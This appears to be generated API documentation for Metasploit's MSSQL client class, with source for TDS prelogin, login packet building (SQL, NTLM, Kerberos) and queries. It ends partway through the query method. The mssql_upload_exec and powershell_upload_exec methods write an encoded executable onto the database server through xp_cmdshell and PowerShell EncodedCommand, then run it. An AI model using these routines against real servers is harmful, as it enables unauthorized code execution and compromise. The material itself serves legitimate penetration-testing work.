Class: Rex::Proto::MSSQL::Client

Inherits:

Object

• Object
• Rex::Proto::MSSQL::Client

Includes:

Metasploit::Framework::Tcp::Client, Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options, Msf::Exploit::Remote::Kerberos::Ticket::Storage, Msf::Exploit::Remote::MSSQL_COMMANDS, Msf::Exploit::Remote::NTLM::Client, Msf::Exploit::Remote::Udp, ClientMixin, Text

Defined in:

lib/rex/proto/mssql/client.rb

Constant Summary

Constants included from ClientMixin

Rex::Proto::MSSQL::ClientMixin::ENCRYPT_NOT_SUP, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_OFF, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_ON, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_REQ, Rex::Proto::MSSQL::ClientMixin::STATUS_END_OF_MESSAGE, Rex::Proto::MSSQL::ClientMixin::STATUS_IGNORE_EVENT, Rex::Proto::MSSQL::ClientMixin::STATUS_NORMAL, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTION, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTIONSKIPTRAN, Rex::Proto::MSSQL::ClientMixin::TYPE_ATTENTION_SIGNAL, Rex::Proto::MSSQL::ClientMixin::TYPE_BULK_LOAD, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_LOGIN_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_RPC, Rex::Proto::MSSQL::ClientMixin::TYPE_SQL_BATCH, Rex::Proto::MSSQL::ClientMixin::TYPE_SSPI_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_TABLE_RESPONSE, Rex::Proto::MSSQL::ClientMixin::TYPE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_TRANSACTION_MANAGER_REQUEST

Instance Attribute Summary

• #auth ⇒ Object

  Returns the value of attribute auth.

• #connection_timeout ⇒ Object

  Returns the value of attribute connection_timeout.

• #current_database ⇒ String

  The database name this client is currently connected to.

• #framework ⇒ Object readonly

  Returns the value of attribute framework.

• #framework_module ⇒ Object readonly

  Returns the value of attribute framework_module.

• #initial_connection_info ⇒ Hash

  Key-value pairs received from the server during the initial MSSQL connection.

• #max_send_size ⇒ Integer

  The max size of the data to encapsulate in a single packet.

• #proxies ⇒ Object

  Returns the value of attribute proxies.

• #send_delay ⇒ Integer

  The delay between sending packets.

• #send_lm ⇒ Object

  Returns the value of attribute send_lm.

• #send_ntlm ⇒ Object

  Returns the value of attribute send_ntlm.

• #send_spn ⇒ Object

  Returns the value of attribute send_spn.

• #sock ⇒ Object

  Returns the value of attribute sock.

• #ssl ⇒ Object

  Returns the value of attribute ssl.

• #ssl_cipher ⇒ Object

  Returns the value of attribute ssl_cipher.

• #ssl_verify_mode ⇒ Object

  Returns the value of attribute ssl_verify_mode.

• #ssl_version ⇒ Object

  Returns the value of attribute ssl_version.

• #tdsencryption ⇒ Object

  Returns the value of attribute tdsencryption.

• #use_lmkey ⇒ Object

  Returns the value of attribute use_lmkey.

• #use_ntlm2_session ⇒ Object

  Returns the value of attribute use_ntlm2_session.

• #use_ntlmv2 ⇒ Object

  Returns the value of attribute use_ntlmv2.

• #windows_authentication ⇒ Object

  Returns the value of attribute windows_authentication.

Attributes included from Msf::Exploit::Remote::Udp

#udp_sock

Instance Method Summary

• #chost ⇒ Object protected
• #cport ⇒ Object protected
• #detect_platform_and_arch ⇒ Hash

  Detect the platform and architecture of the MSSQL server: * :arch [String] The server architecture.

• #initial_info_for_envchange(envchange: nil) ⇒ Hash
• #initialize(framework_module, framework, rhost, rport = 1433, proxies = nil) ⇒ Client constructor

  A new instance of Client.

• #map_compile_arch_to_architecture(server_info) ⇒ Object

  MS SQL Server currently only supports 64 bit but older installs may be x86.

• #map_compile_os_to_platform(server_info) ⇒ Object

  MS SQL Server only supports Windows and Linux.

• #mssql_login(user = 'sa', pass = '', db = '', domain_name = '') ⇒ Object

  This method connects to the server over TCP and attempts to authenticate with the supplied username and password The global socket is used and left connected after auth.

• #mssql_prelogin(enc_error = false) ⇒ Object

  this method send a prelogin packet and check if encryption is off.

• #mssql_ssl_send_recv(req, tdsproxy, timeout = 15, check_status = true) ⇒ Object
• #mssql_upload_exec(exe, debug = false) ⇒ Object
• #peerhost ⇒ Object
• #peerinfo ⇒ Object
• #peerport ⇒ Object
• #powershell_upload_exec(exe, debug = false) ⇒ Object
• #query(sqla, doprint = false, opts = {}) ⇒ Object
• #rhost ⇒ Object protected
• #rport ⇒ Object protected

Methods included from Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options

#kerberos_auth_options

Methods included from Msf::Exploit::Remote::Kerberos::Ticket::Storage

#kerberos_storage_options, #kerberos_ticket_storage, store_ccache

Methods included from Msf::Exploit::Remote::Udp

#cleanup, #connect_udp, #deregister_udp_options, #disconnect_udp, #handler, #lhost, #lport

Methods included from Msf::Exploit::Remote::MSSQL_COMMANDS

#mssql_2k5_password_hashes, #mssql_2k_password_hashes, #mssql_current_user_escalation, #mssql_db_names, #mssql_enumerate_servername, #mssql_is_sysadmin, #mssql_rdp_enable, #mssql_rebuild_xpcmdshell, #mssql_sa_escalation, #mssql_sql_info, #mssql_sql_xpcmdshell_disable_2000, #mssql_xpcmdshell_disable, #mssql_xpcmdshell_enable, #mssql_xpcmdshell_enable_2000

Methods included from ClientMixin

#mssql_parse_done, #mssql_parse_env, #mssql_parse_error, #mssql_parse_info, #mssql_parse_login_ack, #mssql_parse_reply, #mssql_parse_ret, #mssql_parse_tds_reply, #mssql_parse_tds_row, #mssql_print_reply, #mssql_send_recv, #mssql_tds_encrypt, #mssql_xpcmdshell

Methods included from Msf::Module::UI::Message

#print_error, #print_good, #print_prefix, #print_status, #print_warning

Methods included from Msf::Module::UI::Message::Verbose

#vprint_error, #vprint_good, #vprint_status, #vprint_warning

Methods included from Metasploit::Framework::Tcp::Client

#connect, #disconnect, #set_tcp_evasions

Constructor Details

#initialize(framework_module, framework, rhost, rport = 1433, proxies = nil) ⇒ Client

Returns a new instance of Client.

# File 'lib/rex/proto/mssql/client.rb', line 53

def initialize(framework_module, framework, rhost, rport = 1433, proxies = nil)
  @framework_module       = framework_module
  @framework              = framework
  @connection_timeout     = framework_module.datastore['ConnectTimeout']      || 30
  @max_send_size          = framework_module.datastore['TCP::max_send_size']  || 0
  @send_delay             = framework_module.datastore['TCP::send_delay']     || 0

  @auth                   = framework_module.datastore['Mssql::Auth']         || Msf::Exploit::Remote::AuthOption::AUTO
  @hostname               = framework_module.datastore['Mssql::Rhostname']    || ''

  @windows_authentication = framework_module.datastore['USE_WINDOWS_AUTHENT'] || false
  @tdsencryption          = framework_module.datastore['TDSENCRYPTION']       || false
  @hex2binary             = framework_module.datastore['HEX2BINARY']          || ''

  @domain_controller_rhost = framework_module.datastore['DomainControllerRhost'] || ''
  @rhost = rhost
  @rport = rport
  @proxies = proxies
  @current_database = ''
end

Instance Attribute Details

#auth ⇒ Object

Returns the value of attribute auth.

# File 'lib/rex/proto/mssql/client.rb', line 23

def auth
  @auth
end

#connection_timeout ⇒ Object

Returns the value of attribute connection_timeout.

# File 'lib/rex/proto/mssql/client.rb', line 29

def connection_timeout
  @connection_timeout
end

#current_database ⇒ String

Returns The database name this client is currently connected to.

Returns:

• (String) —

  The database name this client is currently connected to.

# File 'lib/rex/proto/mssql/client.rb', line 51

def current_database
  @current_database
end

#framework ⇒ Object (readonly)

Returns the value of attribute framework.

# File 'lib/rex/proto/mssql/client.rb', line 38

def framework
  @framework
end

#framework_module ⇒ Object (readonly)

Returns the value of attribute framework_module.

# File 'lib/rex/proto/mssql/client.rb', line 37

def framework_module
  @framework_module
end

#initial_connection_info ⇒ Hash

Returns Key-value pairs received from the server during the initial MSSQL connection.

Returns:

• (Hash) —

  Key-value pairs received from the server during the initial MSSQL connection.

# File 'lib/rex/proto/mssql/client.rb', line 48

def initial_connection_info
  @initial_connection_info
end

#max_send_size ⇒ Integer

Returns The max size of the data to encapsulate in a single packet.

Returns:

• (Integer) —

  The max size of the data to encapsulate in a single packet

# File 'lib/rex/proto/mssql/client.rb', line 41

def max_send_size
  @max_send_size
end

#proxies ⇒ Object

Returns the value of attribute proxies.

# File 'lib/rex/proto/mssql/client.rb', line 28

def proxies
  @proxies
end

#send_delay ⇒ Integer

Returns The delay between sending packets.

Returns:

• (Integer) —

  The delay between sending packets

# File 'lib/rex/proto/mssql/client.rb', line 44

def send_delay
  @send_delay
end

#send_lm ⇒ Object

Returns the value of attribute send_lm.

# File 'lib/rex/proto/mssql/client.rb', line 30

def send_lm
  @send_lm
end

#send_ntlm ⇒ Object

Returns the value of attribute send_ntlm.

# File 'lib/rex/proto/mssql/client.rb', line 31

def send_ntlm
  @send_ntlm
end

#send_spn ⇒ Object

Returns the value of attribute send_spn.

# File 'lib/rex/proto/mssql/client.rb', line 32

def send_spn
  @send_spn
end

#sock ⇒ Object

Returns the value of attribute sock.

# File 'lib/rex/proto/mssql/client.rb', line 22

def sock
  @sock
end

#ssl ⇒ Object

Returns the value of attribute ssl.

# File 'lib/rex/proto/mssql/client.rb', line 24

def ssl
  @ssl
end

#ssl_cipher ⇒ Object

Returns the value of attribute ssl_cipher.

# File 'lib/rex/proto/mssql/client.rb', line 27

def ssl_cipher
  @ssl_cipher
end

#ssl_verify_mode ⇒ Object

Returns the value of attribute ssl_verify_mode.

# File 'lib/rex/proto/mssql/client.rb', line 26

def ssl_verify_mode
  @ssl_verify_mode
end

#ssl_version ⇒ Object

Returns the value of attribute ssl_version.

# File 'lib/rex/proto/mssql/client.rb', line 25

def ssl_version
  @ssl_version
end

#tdsencryption ⇒ Object

Returns the value of attribute tdsencryption.

# File 'lib/rex/proto/mssql/client.rb', line 21

def tdsencryption
  @tdsencryption
end

#use_lmkey ⇒ Object

Returns the value of attribute use_lmkey.

# File 'lib/rex/proto/mssql/client.rb', line 33

def use_lmkey
  @use_lmkey
end

#use_ntlm2_session ⇒ Object

Returns the value of attribute use_ntlm2_session.

# File 'lib/rex/proto/mssql/client.rb', line 34

def use_ntlm2_session
  @use_ntlm2_session
end

#use_ntlmv2 ⇒ Object

Returns the value of attribute use_ntlmv2.

# File 'lib/rex/proto/mssql/client.rb', line 35

def use_ntlmv2
  @use_ntlmv2
end

#windows_authentication ⇒ Object

Returns the value of attribute windows_authentication.

# File 'lib/rex/proto/mssql/client.rb', line 36

def windows_authentication
  @windows_authentication
end

Instance Method Details

#chost ⇒ Object (protected)

# File 'lib/rex/proto/mssql/client.rb', line 738

def chost
  return nil
end

#cport ⇒ Object (protected)

# File 'lib/rex/proto/mssql/client.rb', line 742

def cport
  return nil
end

#detect_platform_and_arch ⇒ Hash

Returns Detect the platform and architecture of the MSSQL server:

• :arch [String] The server architecture.

• :platform [String] The server platform.

Returns:

• (Hash) —

  Detect the platform and architecture of the MSSQL server:

  • :arch [String] The server architecture.

  • :platform [String] The server platform.

# File 'lib/rex/proto/mssql/client.rb', line 115

def detect_platform_and_arch
  result = {}

  server_vars = query('select @@version')[:rows][0][0]

  result[:arch]     = map_compile_arch_to_architecture(server_vars)
  result[:platform] = map_compile_os_to_platform(server_vars)
  result
end

#initial_info_for_envchange(envchange: nil) ⇒ Hash

Parameters:

• envchange (ENVCHANGE) (defaults to: nil) —

  The ENVCHANGE type to get the information for.

Returns:

• (Hash) —

  Returns a hash of values if the provided type exists.

• (Hash) —

  Returns the whole connection info if envchange is nil.

• (Hash) —

  Returns an empty hash if the provided type is not present.

# File 'lib/rex/proto/mssql/client.rb', line 709

def initial_info_for_envchange(envchange: nil)
  return self.initial_connection_info if envchange.nil?
  return nil unless (self.initial_connection_info && self.initial_connection_info.is_a?(::Hash))

  self.initial_connection_info[:envs]&.select { |hash| hash[:type] == envchange }&.first || {}
end

#map_compile_arch_to_architecture(server_info) ⇒ Object

MS SQL Server currently only supports 64 bit but older installs may be x86

# File 'lib/rex/proto/mssql/client.rb', line 93

def map_compile_arch_to_architecture(server_info)
  return '' if server_info.blank?

  arch_data = server_info.downcase.encode(::Encoding::BINARY)

  if arch_data.match?('x64')
    arch = ARCH_X86_64
  elsif arch_data.match?('x86')
    arch = ARCH_X86
  elsif arch_data.match?('64')
    arch = ARCH_X86_64
  elsif arch_data.match?('32-bit')
    arch = ARCH_X86
  else
    arch = arch_data
  end
  arch
end

#map_compile_os_to_platform(server_info) ⇒ Object

MS SQL Server only supports Windows and Linux

# File 'lib/rex/proto/mssql/client.rb', line 75

def map_compile_os_to_platform(server_info)
  return '' if server_info.blank?

  os_data = server_info.downcase.encode(::Encoding::BINARY)

  if os_data.match?('linux')
    platform = Msf::Platform::Linux.realname
  elsif os_data.match?('windows')
    platform = Msf::Platform::Windows.realname
  elsif os_data.match?('win')
    platform = Msf::Platform::Windows.realname
  else
    platform = os_data
  end
  platform
end

#mssql_login(user = 'sa', pass = '', db = '', domain_name = '') ⇒ Object

This method connects to the server over TCP and attempts to authenticate with the supplied username and password The global socket is used and left connected after auth

# File 'lib/rex/proto/mssql/client.rb', line 131

def mssql_login(user='sa', pass='', db='', domain_name='')
  disconnect if self.sock
  connect
  mssql_prelogin

  if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr =  [
      TYPE_TDS7_LOGIN, #type
      STATUS_END_OF_MESSAGE, #status
      0x0000, #length
      0x0000, # SPID
      0x01,   # PacketID (unused upon specification
      # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
      0x00   #Window
    ]

    pkt << [
      0x00000000,   # Size
      0x71000001,   # TDS Version
      0x00000000,   # Dummy Size
      0x00000007,   # Version
      rand(1024+1), # PID
      0x00000000,   # ConnectionID
      0xe0,         # Option Flags 1
      0x83,         # Option Flags 2
      0x00,         # SQL Type Flags
      0x00,         # Reserved Flags
      0x00000000,   # Time Zone
      0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')

    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
    sname = Rex::Text.to_unicode( rhost )
    framework_module.fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using kerberos authentication.') if @hostname.blank?
    kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
      host: @domain_controller_rhost,
      hostname: @hostname,
      mssql_port: rport,
      proxies: proxies,
      realm: domain_name,
      username: user,
      password: pass,
      framework: framework,
      framework_module: framework_module,
      ticket_storage: Msf::Exploit::Remote::Kerberos::Ticket::Storage::WriteOnly.new(framework: framework, framework_module: framework_module)
    )

    kerberos_result = kerberos_authenticator.authenticate
    ssp_security_blob = kerberos_result[:security_blob]

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [0, 0].pack('vv') # User length offset must be 0
    pkt << [0, 0].pack('vv') # Password length offset must be 0

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv') # unused

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv') # locales

    pkt << [idx, 0].pack('vv') #db

    # ClientID (should be mac address)
    pkt << Rex::Text.rand_text(6)

    # SSP
    pkt << [idx, ssp_security_blob.length].pack('vv')
    idx += ssp_security_blob.length

    pkt << [idx, 0].pack('vv') # AtchDBFile

    pkt << cname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << ssp_security_blob

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    pkt_hdr[2] = pkt.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + pkt

    # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
    # has a strange behavior that differs from the specifications
    # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
    # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
    resp = mssql_send_recv(pkt, 15, false)

    info = {:errors => []}
    info = mssql_parse_reply(resp, info)
    self.initial_connection_info = info

    return false if not info
    return info[:login_ack] ? true : false
  elsif auth == Msf::Exploit::Remote::AuthOption::NTLM || windows_authentication
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr =  [
        TYPE_TDS7_LOGIN, #type
        STATUS_END_OF_MESSAGE, #status
        0x0000, #length
        0x0000, # SPID
        0x01,   # PacketID (unused upon specification
        # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
        0x00   #Window
    ]

    pkt << [
        0x00000000,   # Size
        0x71000001,   # TDS Version
        0x00000000,   # Dummy Size
        0x00000007,   # Version
        rand(1024+1), # PID
        0x00000000,   # ConnectionID
        0xe0,         # Option Flags 1
        0x83,         # Option Flags 2
        0x00,         # SQL Type Flags
        0x00,         # Reserved Flags
        0x00000000,   # Time Zone
        0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')

    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
    sname = Rex::Text.to_unicode( rhost )
    dname = Rex::Text.to_unicode( db )

    workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)

    ntlm_client = ::Net::NTLM::Client.new(
      user,
      pass,
      workstation: workstation_name,
      domain: domain_name,
    )
    type1 = ntlm_client.init_context
    # SQL 2012, at least, does not support KEY_EXCHANGE
    type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
    ntlmsspblob = type1.serialize

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [0, 0].pack('vv') # User length offset must be 0
    pkt << [0, 0].pack('vv') # Password length offset must be 0

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv') # unused

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv') # locales

    pkt << [idx, 0].pack('vv') #db

    # ClientID (should be mac address)
    pkt << Rex::Text.rand_text(6)

    # NTLMSSP
    pkt << [idx, ntlmsspblob.length].pack('vv')
    idx += ntlmsspblob.length

    pkt << [idx, 0].pack('vv') # AtchDBFile

    pkt << cname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << ntlmsspblob

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    pkt_hdr[2] = pkt.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + pkt

    # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
    # has a strange behavior that differs from the specifications
    # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
    # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
    if tdsencryption == true
       proxy = TDSSSLProxy.new(sock)
       proxy.setup_ssl
       resp = proxy.send_recv(pkt)
    else
       resp = mssql_send_recv(pkt, 15, false)
    end

    # Strip the TDS header
    resp = resp[3..-1]
    type3 = ntlm_client.init_context([resp].pack('m'))
    type3_blob = type3.serialize

    # Create an SSPIMessage
    idx = 0
    pkt = ''
    pkt_hdr = ''
    pkt_hdr = [
      TYPE_SSPI_MESSAGE, #type
      STATUS_END_OF_MESSAGE, #status
      0x0000, #length
      0x0000, # SPID
      0x01, # PacketID
      0x00 #Window
    ]

    pkt_hdr[2] = type3_blob.length + 8

    pkt = pkt_hdr.pack("CCnnCC") + type3_blob

    if self.tdsencryption == true
      resp = mssql_ssl_send_recv(pkt, proxy)
      proxy.cleanup
      proxy = nil
    else
      resp = mssql_send_recv(pkt)
    end

    #SQL Server Authentication
  else
    idx = 0
    pkt = ''
    pkt << [
        0x00000000,   # Dummy size

        0x71000001,   # TDS Version
        0x00000000,   # Size
        0x00000007,   # Version
        rand(1024+1), # PID
        0x00000000,   # ConnectionID
        0xe0,         # Option Flags 1
        0x03,         # Option Flags 2
        0x00,         # SQL Type Flags
        0x00,         # Reserved Flags
        0x00000000,   # Time Zone
        0x00000000    # Collation
    ].pack('VVVVVVCCCCVV')


    cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    uname = Rex::Text.to_unicode( user )
    pname = mssql_tds_encrypt( pass )
    aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
    sname = Rex::Text.to_unicode( rhost )
    dname = Rex::Text.to_unicode( db )

    idx = pkt.size + 50 # lengths below

    pkt << [idx, cname.length / 2].pack('vv')
    idx += cname.length

    pkt << [idx, uname.length / 2].pack('vv')
    idx += uname.length

    pkt << [idx, pname.length / 2].pack('vv')
    idx += pname.length

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, sname.length / 2].pack('vv')
    idx += sname.length

    pkt << [0, 0].pack('vv')

    pkt << [idx, aname.length / 2].pack('vv')
    idx += aname.length

    pkt << [idx, 0].pack('vv')

    pkt << [idx, dname.length / 2].pack('vv')
    idx += dname.length

    # The total length has to be embedded twice more here
    pkt << [
        0,
        0,
        0x12345678,
        0x12345678
    ].pack('vVVV')

    pkt << cname
    pkt << uname
    pkt << pname
    pkt << aname
    pkt << sname
    pkt << aname
    pkt << dname

    # Total packet length
    pkt[0, 4] = [pkt.length].pack('V')

    # Embedded packet lengths
    pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2

    # Packet header and total length including header
    pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt

    if self.tdsencryption == true
      proxy = TDSSSLProxy.new(sock)
      proxy.setup_ssl
      resp = mssql_ssl_send_recv(pkt, proxy)
      proxy.cleanup
      proxy = nil
    else
      resp = mssql_send_recv(pkt)
    end

  end

  info = {:errors => []}
  info = mssql_parse_reply(resp, info)
  self.initial_connection_info = info

  return false if not info
  info[:login_ack] ? true : false
end

#mssql_prelogin(enc_error = false) ⇒ Object

this method send a prelogin packet and check if encryption is off

# File 'lib/rex/proto/mssql/client.rb', line 479

def mssql_prelogin(enc_error=false)
  pkt = ""
  pkt_hdr = ""
  pkt_data_token = ""
  pkt_data = ""


  pkt_hdr = [
      TYPE_PRE_LOGIN_MESSAGE, #type
      STATUS_END_OF_MESSAGE, #status
      0x0000, #length
      0x0000, # SPID
      0x00, # PacketID
      0x00 #Window
  ]

  version = [0x55010008, 0x0000].pack("Vv")

  # if manually set, we will honour
  if tdsencryption == true
    encryption = ENCRYPT_ON
  else
    encryption = ENCRYPT_NOT_SUP
  end

  instoptdata = "MSSQLServer\0"

  threadid = "\0\0" + Rex::Text.rand_text(2)

  idx = 21 # size of pkt_data_token
  pkt_data_token << [
      0x00, # Token 0 type Version
      idx , # VersionOffset
      version.length, # VersionLength

      0x01, # Token 1 type Encryption
      idx = idx + version.length, # EncryptionOffset
      0x01, # EncryptionLength

      0x02, # Token 2 type InstOpt
      idx = idx + 1, # InstOptOffset
      instoptdata.length, # InstOptLength

      0x03, # Token 3 type Threadid
      idx + instoptdata.length, # ThreadIdOffset
      0x04, # ThreadIdLength

      0xFF
  ].pack("CnnCnnCnnCnnC")

  pkt_data << pkt_data_token
  pkt_data << version
  pkt_data << encryption
  pkt_data << instoptdata
  pkt_data << threadid

  pkt_hdr[2] = pkt_data.length + 8

  pkt = pkt_hdr.pack("CCnnCC") + pkt_data

  resp = mssql_send_recv(pkt)

  idx = 0

  while resp && resp[0, 1] != "\xff" && resp.length > 5
    token = resp.slice!(0, 5)
    token = token.unpack("Cnn")
    idx -= 5
    if token[0] == 0x01

      idx += token[1]
      break
    end
  end
  if idx > 0
    encryption_mode = resp[idx, 1].unpack("C")[0]
  else
    framework_module.print_error("Unable to parse encryption req " \
      "during pre-login, this may not be a MSSQL server")
    encryption_mode = ENCRYPT_NOT_SUP
  end

  ##########################################################
  # Our initial prelogin pkt above said we didnt support
  # encryption (it's quicker and the default).
  #
  # Per the matrix on the following link, SQL Server will
  # terminate the connection if it does require TLS,
  # otherwise it will accept an unencrypted session. As
  # part of this initial response packet, it also returns
  # ENCRYPT_REQ.
  #
  # https://msdn.microsoft.com\
  #   /en-us/library/ee320519(v=sql.105).aspx
  #
  ##########################################################

  if encryption_mode == ENCRYPT_REQ
    # restart prelogin process except that we tell SQL Server
    # than we are now able to encrypt
    disconnect if self.sock
    connect

    # offset 35 is the flag - turn it on
    pkt[35] = [ENCRYPT_ON].pack('C')
    self.tdsencryption = true
    framework_module.print_status("TLS encryption has " \
      "been enabled based on server response.")

    resp = mssql_send_recv(pkt)

    idx = 0

    while resp && resp[0, 1] != "\xff" && resp.length > 5
      token = resp.slice!(0, 5)
      token = token.unpack("Cnn")
      idx -= 5
      if token[0] == 0x01
        idx += token[1]
        break
      end
    end
    if idx > 0
      encryption_mode = resp[idx, 1].unpack("C")[0]
    else
      framework_module.print_error("Unable to parse encryption req " \
        "during pre-login, this may not be a MSSQL server")
      encryption_mode = ENCRYPT_NOT_SUP
    end
  end
  encryption_mode
end

#mssql_ssl_send_recv(req, tdsproxy, timeout = 15, check_status = true) ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 612

def mssql_ssl_send_recv(req, tdsproxy, timeout=15, check_status=true)
  tdsproxy.send_recv(req)
end

#mssql_upload_exec(exe, debug = false) ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 643

def mssql_upload_exec(exe, debug=false)
  hex = exe.unpack("H*")[0]

  var_bypass  = Rex::Text.rand_text_alpha(8)
  var_payload = Rex::Text.rand_text_alpha(8)

  print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
  print_status("Writing the debug.com loader to the disk...")
  h2b = File.read(@hex2binary, File.size(@hex2binary))
  h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
  h2b.split(/\n/).each do |line|
    mssql_xpcmdshell("#{line}", false)
  end

  print_status("Converting the debug script to an executable...")
  mssql_xpcmdshell("cmd.exe /c cd %TEMP% && cd %TEMP% && debug < %TEMP%\\#{var_bypass}", debug)
  mssql_xpcmdshell("cmd.exe /c move %TEMP%\\#{var_bypass}.bin %TEMP%\\#{var_bypass}.exe", debug)

  print_status("Uploading the payload, please be patient...")
  idx = 0
  cnt = 500
  while(idx < hex.length - 1)
    mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
    idx += cnt
  end

  print_status("Converting the encoded payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)

  print_status("Executing the payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
end

#peerhost ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 716

def peerhost
  rhost
end

#peerinfo ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 724

def peerinfo
  "#{peerhost}:#{peerport}"
end

#peerport ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 720

def peerport
  rport
end

#powershell_upload_exec(exe, debug = false) ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 678

def powershell_upload_exec(exe, debug=false)
  # hex converter
  hex = exe.unpack("H*")[0]
  # create random alpha 8 character names
  #var_bypass  = rand_text_alpha(8)
  var_payload = rand_text_alpha(8)
  print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
  # our payload converter, grabs a hex file and converts it to binary for us through powershell
  h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);$s = $s.Replace('`r',''); $s = $s.Replace('`n','');$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"
  h2b_unicode=Rex::Text.to_unicode(h2b)
  # base64 encode it, this allows us to perform execution through powershell without registry changes
  h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
  print_status("Uploading the payload #{var_payload}, please be patient...")
  idx = 0
  cnt = 500
  while(idx < hex.length - 1)
    mssql_xpcmdshell("cmd.exe /c echo #{hex[idx, cnt]}>>%TEMP%\\#{var_payload}", false)
    idx += cnt
  end
  print_status("Converting the payload utilizing PowerShell EncodedCommand...")
  mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
  print_status("Executing the payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
  print_status("Be sure to cleanup #{var_payload}.exe...")
end

#query(sqla, doprint = false, opts = {}) ⇒ Object

# File 'lib/rex/proto/mssql/client.rb', line 616

def query(sqla, doprint=false, opts={})
  info = { :sql => sqla }
  opts[:timeout] ||= 15
  pkts = []
  idx  = 0

  bsize = 4096 - 8
  chan  = 0

  @cnt ||= 0
  @cnt += 1

  sql = Rex::Text.to_unicode(sqla)
  while(idx < sql.length)
    buf = sql[idx, bsize]
    flg = buf.length < bsize ? "\x01" : "\x00"
    pkts << "\x01" + flg + [buf.length + 8].pack('n') + [chan].pack('n') + [@cnt].pack('C') + "\x00" + buf
    idx += bsize

  end

  resp = mssql_send_recv(pkts.join, opts[:timeout])
  mssql_parse_reply(resp, info)
